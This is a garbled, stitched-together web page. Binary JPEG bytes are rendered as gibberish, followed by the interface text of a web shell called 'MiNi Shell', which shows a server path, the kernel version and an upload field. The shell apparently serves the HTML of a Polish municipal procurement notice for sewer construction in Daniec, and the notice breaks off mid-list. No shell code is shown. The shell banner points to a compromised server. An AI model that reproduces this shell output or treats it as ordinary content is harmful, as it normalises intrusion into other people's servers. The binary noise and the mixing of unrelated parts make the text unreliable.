JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20230102/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20230102/0000223001-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa kanalizacji sanitarnej w miejscowości Daniec – etap I </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA CHRZĄSTOWICE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 531413018</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Dworcowa 38</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Chrząstowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">46-053</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">774219696</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ug@chrzastowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://chrzastowice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa kanalizacji sanitarnej w miejscowości Daniec – etap I </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b8ed5af9-8a90-11ed-94da-6ae0fe5e7159</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00002230</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-01-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/chrzastowice <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Komunikacja między Zamawiającym a Wykonawcą, w tym składanie ofert, wymiana<br/>informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawca, z uwzględnieniem wyjątków<br/>określonych w ustawie p.z.p. odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej<br/>rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą<br/>elektroniczną (Dz.U. z 2020 r. poz. 344).<br/>2. Zgodnie z przyjętą przez Zamawiającego formą porozumiewania się z Wykonawcą przy użyciu środków komunikacji<br/>elektronicznej za pośrednictwem Platformy pod adresem: https://platformazakupowa.pl/pn/chrzastowice<br/>3. Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej w przypadku awarii platformy,<br/>email: zagospodarowanie@chrzastowice.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Formaty plików wykorzystywanych<br/>przez wykonawców powinny być zgodne z “OBWIESZCZENIEM PREZESA RADY MINISTRÓW z dnia 9 listopada 2017 r. w sprawie<br/>ogłoszenia jednolitego tekstu rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań<br/>dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów<br/>teleinformatycznych”.<br/>Poniżej przedstawiamy listę sugerowanych zapisów do specyfikacji:<br/>1) Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg) ze szczególnym wskazaniem na .pdf<br/>2) W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów:<br/>a) .zip<br/>b) .7Z<br/>3) Wśród formatów powszechnych a NIE występujących w rozporządzeniu występują: .rar .gif .bmp .numbers .pages. Dokumenty<br/>złożone w takich plikach zostaną uznane za złożone nieskutecznie.<br/>4) Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi max 10MB, oraz<br/>na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu osobistego, który wynosi max<br/>5MB.<br/>5) Ze względu na niskie ryzyko naruszenia integralności pliku oraz łatwiejszą weryfikację podpisu, zamawiający zaleca, w miarę<br/>możliwości, przekonwertowanie plików składających się na ofertę na format .pdf i opatrzenie ich podpisem kwalifikowanym PAdES.<br/>6) Pliki w innych formatach niż PDF zaleca się opatrzyć zewnętrznym podpisem XAdES. Wykonawca powinien pamiętać, aby plik z<br/>podpisem przekazywać łącznie z dokumentem podpisywanym.<br/>7) Zamawiający zaleca aby w przypadku podpisywania pliku przez kilka osób, stosować podpisy tego samego rodzaju.<br/>Podpisywanie różnymi rodzajami podpisów np. osobistym i kwalifikowanym może doprowadzić do problemów w weryfikacji plików.<br/>8) Zamawiający zaleca, aby Wykonawca z odpowiednim wyprzedzeniem przetestował możliwość prawidłowego wykorzystania<br/>wybranej metody podpisania plików oferty.<br/>9) Zaleca się, aby komunikacja z Wykonawcami odbywała się tylko na Platformie za pośrednictwem formularza “Wyślij wiadomość<br/>do zamawiającego”, nie za pośrednictwem adresu email.<br/>10) Osobą składającą ofertę powinna być osoba kontaktowa podawana w dokumentacji.<br/>11) Ofertę należy przygotować z należytą starannością dla podmiotu ubiegającego się o udzielenie zamówienia publicznego i<br/>zachowaniem odpowiedniego odstępu czasu do zakończenia przyjmowania ofert/wniosków. Sugerujemy złożenie oferty na 24<br/>godziny przed terminem składania ofert/wniosków.<br/>12) Podczas podpisywania plików zaleca się stosowanie algorytmu skrótu SHA2 zamiast SHA1.<br/>13) Jeśli Wykonawca pakuje dokumenty np. w plik ZIP zalecamy wcześniejsze podpisanie każdego ze skompresowanych plików.<br/>14) Zamawiający rekomenduje wykorzystanie podpisu z kwalifikowanym znacznikiem czasu.<br/>15) Zamawiający zaleca aby nie wprowadzać jakichkolwiek zmian w plikach po podpisaniu ich podpisem kwalifikowanym. Może to<br/>skutkować naruszeniem integralności plików co równoważne będzie z koniecznością odrzucenia oferty w postępowaniu.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">I. Klauzula informacyjna RODO dot. przetwarzania danych osobowych na podstawie obowiązku prawnego ciążącego na administratorze:<br/>1) Administratorem Państwa danych w Urzędzie Gminy Chrząstowice (REGON: 000535741) z siedzibą przy ul. Dworcowej 38, 46-<br/>053 Chrząstowice jest Wójt Gminy Chrząstowice, wykonujący czynności i zadania wynikające z przepisów prawa. Z Administratorem<br/>można skontaktować się pisemnie - kierując korespondencję na adres siedziby Administratora.<br/>2) DANE KONTAKTOWE INSPEKTORA OCHRONY DANYCH: Pytania dotyczące sposobu i zakresu przetwarzania danych osobowych, a także przysługujących uprawnień, może Pani/Pan kierować do Inspektora Ochrony Danych Osobowych pisemnie na adres siedziby Administratora, jak również pod numerem tel.: 887818800 lub poprzez e-mail: iodo@chrzastowice.pl.<br/>3) CELE PRZETWARZANIA I PODSTAWA PRAWNA: Dane Wykonawcy będą przetwarzane w celu zawarcia i realizacji umowy cywilno-prawnej w zakresie określonym obowiązującymi przepisami, w tymi przepisami prawa cywilnego; w zakresie wypełniania obowiązków prawnych ciążących na Administratorze na podstawie powszechnie obowiązujących przepisów prawa; w zakresie gdzie przetwarzanie danych osobowych jest niezbędne do wykonania przez Administratora celów kontaktowych oraz realizacji praw i<br/>obowiązków podmiotów realizujących umowy cywilnoprawne w ramach, których następuje przekazanie danych osobowych, jak również w celu ustalenia lub dochodzenia roszczeń lub w celu obrony przed roszczeniami i celach archiwizacyjnych - art. 6 ust. 1 lit. b, c oraz f RODO.<br/>4) ODBIORCY DANYCH: Dane osobowe przekazane w umowach cywilnoprawnych mogą być udostępniane upoważnionym<br/>pracownikom Administratora, członkom organów Administratora, podmiotom dostarczającym lub utrzymującym infrastrukturę IT<br/>Administratora, podmiotom i osobom świadczącym na rzecz Administratora usługi ubezpieczeniowe, usługi prawne oraz innym podmiotom, którym Administrator w celu wykonywania praw i obowiązków wynikających z zawartych umów cywilnoprawnych powierzył dane osobowe (procesorom), a także organom uprawnionym do otrzymywania danych osobowych na podstawie przepisów prawa. Dane osobowe mogą być przekazane wyłącznie podmiotom, które uprawnione są do ich otrzymania przepisami<br/>prawa oraz podmiotom realizującym usługi w imieniu i na rzecz Administratora w zakresie niezbędnym dla prawidłowego<br/>funkcjonowania.<br/>5) OKRES PRZECHOWYWANIA DANYCH: Dane przetwarzane będą przez okres trwania umowy, jak również przez okres trwania wymagalności ewentualnych roszczeń, zgodnie z art. 118 Ustawy z dnia 23 kwietnia 1964 r. - Kodeks cywilny, a po tym czasie przez okres wymagany przez przepisy powszechnie obowiązującego prawa, w tym<br/>w zakresie archiwizacji.<br/>6) PRAWA PODMIOTÓW DANYCH: Wykonawca posiada prawo dostępu do treści danych oraz prawo ich sprostowania, usunięcia (jeśli zachodzi jedna z okoliczności wskazanych w art. 17 ust. 1 RODO i jeżeli przetwarzanie danych osobowych nie jest niezbędne w zakresie wskazanym w art. 17 ust. 3 RODO), ograniczenia przetwarzania (w przypadkach wskazanych w art. 18 ust. 1 RODO), prawo do przenoszenia danych, prawo wniesienia sprzeciwu, prawo do cofnięcia zgody (jeżeli przetwarzanie odbywa się na podstawie zgody) w dowolnym momencie bez wpływu na zgodność z prawem przetwarzania, którego dokonano na podstawie zgody<br/>przed jej cofnięciem. Wszystkie wymienione prawa wymagają pisemnej formy.<br/>7) PRAWO WNIESIENIA SKARGI DO ORGANU NADZORCZEGO: Wykonawcy przysługuje prawo wniesienia skargi do organu<br/>nadzorczego zajmującego się ochroną danych osobowych w państwie członkowskim zwykłego pobytu, miejsca pracy lub miejsca popełnienia domniemanego naruszenia. Biuro Prezesa Urzędu Ochrony Danych Osobowych (PUODO) Adres: ul. Stawki 2, 00-193 Warszawa, Telefon: 22 531 03 00.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">8) ŹRÓDŁO POCHODZENIA DANYCH OSOBOWYCH: Dane pochodzą od osób których<br/>dane dotyczą i zostały udostępnione na podstawie zawartej umowy cywilno-prawnej.<br/>9) INFORMACJA O DOWOLNOŚCI LUB OBOWIĄZKU PODANIA DANYCH: Podanie danych osobowych jest warunkiem niezbędnym do zawarcia umowy cywilno-prawnej. W przypadku nie podania danych osobowych nie będzie możliwe jej zawarcie.<br/>10) PRZEKAZANIE DANYCH OSOBOWYCH DO PAŃSTWA TRZECIEGO LUB ORGANIZACJI MIĘDZYNARODOWEJ: Może wystąpić, jeżeli wystąpi o to państwo trzecie lub organizacja międzynarodowa, jednak po wykazaniu zgodności z przepisami RODO.<br/>11) INFORMACJE O ZAUTOMATYZOWANYM PODEJMOWANIU DECYZJI, W TYM O PROFILOWANIU: Pani/Pana dane mogą być przetwarzane w sposób zautomatyzowany i nie będą profilowane.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na kilka części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ 1 <br/>na podstawie dokumentacji projektowej: <br/>„Budowa kanalizacji sanitarnej w miejscowości Daniec - etap II zad.1<br/>tj. budowa tranzytu kanalizacji tłocznej do miejscowości Dębska Kuźnia na dł. 2426,5 m (od Wł1 do P3) z przepompownią ścieków P3 oraz kanalizacją grawitacyjną na dł. 322,5 m (od P3 do S6).<br/>1)	Budowa kolektora tranzytowego tłocznego C1 – przewiert sterowany <br/>a)	Wykonanie kanalizacji ciśnieniowej metodą przewiertu sterowanego z rur PEHD DN125 SDR 11 RC na odcinku od istniejącej Ks125 w miejscowości Dębska Kuźnia ul. Daniecka 4 – 2426,5 mb,<br/>b)	Budowa studni czyszczakowej betonowej DN1200 wraz z wyposażeniem (2 zasuwy nożowe trójnik z zaworem i końcówką strażacką) na odcinku rurociągu tłocznego – 6 kpl.<br/>c)	Budowa studni napowietrzająco-odpowietrzającej betonowej Dn2000 wraz z wyposażeniem (2 zasuwy nożowe trójnik, zawór napowietrzająco-odpowietrzający).<br/>2)	Budowa przepompowni ścieków P3<br/>a)	Dostawa i montaż przepompowi ścieków P3 wraz z komorą pomiarową i wyposażeniem (pompy, armatura, rurociągi, przepływomierz) – 1 kpl.,<br/>b)	Zagospodarowanie terenu przepompowni, kostka, ogrodzenie, brama wjazdowa, oświetlenie – 1 kpl. <br/>c)	Wykonanie przyłącza energetycznego do przepompowni z uzyskaniem stosownym zgód firmy Tauron oraz podłączenie i rozruch przepompowni – 1 kpl.,<br/>d)	Wpięcie przepompowni do systemu zdalnego zarządzania obiektami wod.-kan. na terenie Gminy Chrząstowice (SCADA ) – 1 kpl. <br/>3)	Budowa kolektora grawitacyjnego G1 na odcinku od P3 do studni S6 – metodą przewiertu z rur kamionkowych <br/>a)	Rozbiórka podbudowy w miejscach komór przewiertowych i studni 5 szt. – 139,25 m2,<br/>b)	Budowa metodą bez wykopową kolektora kanalizacji sanitarnej grawitacyjnego DN200 z rur kamionkowych przewiertowych na odcinku od P3 do S6 – 322,5 mb,<br/>c)	Budowa komór przewiertowych oraz osadzenie w nich studni rewizyjnych betonowych DN 1000 (kompletnych z włazem i regulacją) o numerach S1; S2; S3; S4; S5; S6; – 6 kpl.,<br/>d)	Budowa komór przewiertowych oraz osadzenie w nich studni rewizyjnych polipropylenowych DN 600 (kompletnych z włazem i regulacją) o numerach S7a; S7b – 2 kpl.,<br/>e)	Odtworzenie podbudowy z kamienia gr 20 cm w miejscach studni kanalizacyjnych – 139,25 m2. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45232410-9 - Roboty w zakresie kanalizacji ściekowej</p> <p class="mb-0">45232423-3 - Roboty budowlane w zakresie przepompowni ścieków</p> <p class="mb-0">45232440-8 - Roboty budowlane w zakresie budowy rurociągów do odprowadzania ścieków</p> <p class="mb-0">45232400-6 - Roboty budowlane w zakresie kanałów ściekowych</p> <p class="mb-0">45232411-6 - Roboty budowlane w zakresie rurociągów wody ściekowej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje możliwości udzielenia zamówień polegających na powtórzeniu podobnych robót budowlanych w rozumieniu przepisu art. 214 ust. 1 pkt 7 i 8 Pzp do 25% wartości zamówienia podstawowego tj. dokonanie dodatkowych max. 20 szt. przyłączy kanalizacyjnych ciśnieniowych oraz wykonanie max. 600,00 m rurociągów ciśnieniowych.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą uznana zostanie oferta zawierająca najkorzystniejszy bilans punktów w kryteriach:<br/>a)	Cena (C)	<br/>b)	Okres gwarancji i rękojmi na wykonane roboty budowlane (G)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi na wykonane roboty budowlane</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ 2<br/>na podstawie dokumentacji projektowej:<br/>„Budowa kanalizacji sanitarnej w miejscowości Daniec - etap II zad.2”<br/><br/>w zakresie budowy odcinka kanalizacji grawitacyjnej na dł. 1916 m (od S6 do S46) wraz z odnogami od ul. Dębskiej Kuźni oraz przyłączami grawitacyjnymi (60 szt.) i przyłączami ciśnieniowymi (2 szt.) do posesji.<br/><br/>1)	Budowa kolektora grawitacyjnego G1 na odcinku od S6 do studni S18 – metodą przewiertu z rur kamionkowych <br/><br/>a)	Rozbiórka podbudowy w miejscach komór przewiertowych i studni 12 szt.*5 m*5m – 300 m2,<br/>b)	Budowa metodą bez wykopową kolektora kanalizacji sanitarnej grawitacyjnego DN200 z rur kamionkowych przewiertowych na odcinku od S6 do S18 – 624 mb,<br/>c)	Budowa komór przewiertowych oraz osadzenie w nich studni rewizyjnych betonowych DN 1000 (kompletnych z włazem i regulacją) o numerach S7; S8; S9; S10; S12; S13; S14; S15; S16; S16a; S17; S18 – 12 kpl.,<br/>d)	Budowa komór przewiertowych oraz osadzenie w nich studni rewizyjnych polipropylenowych DN 600 (kompletnych z włazem i regulacją) o numerach S7a; S7b – 2 kpl.,<br/>e)	Odtworzenie podbudowy z kamienia gr 20 cm w miejscach studni kanalizacyjnych – 300 m2,<br/>f)	Odtworzenie nawierzchni drogi w miejscach studni kanalizacyjnych – 300 m2.<br/><br/>2)	Budowa kolektorów kanalizacji grawitacyjnych G1 na odcinku od S6 do S46; G1/1 od S10 do S11; G1/2 od S20 do S65; G1/3 od S23 do S67; G1/4 od S31 do S69a; G2 od S 36 do S83; G1/5 od S38 do S70; G1/6 od S39 do S39a; G1/6a od S40 do S40a; G1/7 od S43 do S75 – metodą wykopów otwartych <br/><br/>a)	Frezowanie nawierzchni asfaltowej na odcinku od S18 do S46 z odnogami kanalizacji dla kolektorów bocznych od ul. Dębskiej Kuźni na odcinku S18-S46 (1292 mb) szerokość jezdni 5 mb – 6460,00 m2,<br/>b)	Rozbiórka podbudowy w miejscach przekopów 1292,0*2,5m – 3230,00 m2,<br/>c)	Kolektor G1 na odcinku od S18 do S46 – 1077,0 mb,<br/>d)	Kolektor G1/1 od S10 do S11 - 8 mb,<br/>e)	Kolektor G1/2 od S20 do S65 - 21 mb,<br/>f)	Kolektor G1/3 od S23 do S67 - 74 mb,<br/>g)	Kolektor G1/4 od S31 do S69a - 40 mb,<br/>h)	Kolektor G2 od S36 do S83 - 5,5 mb,<br/>i)	Kolektor G1/5 od S38 do S70 - 9 mb,<br/>j)	Kolektor G1/6 od S39 do S39a - 19,5 mb,<br/>k)	Kolektor G1/6a od S40 do S40a - 23,5 mb,<br/>l)	Kolektor G1/7 od S43 do S75 - 15 mb. <br/>Łączna długość kanałów grawitacyjnych z rur PVC DN200 SN 8 – 1292,00 mb <br/>Materiały kanałów z rur PVC Dn200 SN8, kielichy długie z zamkiem blokującym, zapobiegającym wywijaniu się uszczelek.<br/>m)	Montaż trójników redukcyjnych pod przyłącza (komplet z kolankami) – 29 kpl.<br/>n)	Budowa studni rewizyjnych betonowych DN 1000 (kompletnych z włazem i regulacją) o numerach S19; S20; S21; S22; S23; S24; S25; S26; S27; S28; S29; S30; S31; S32; S33; S34; 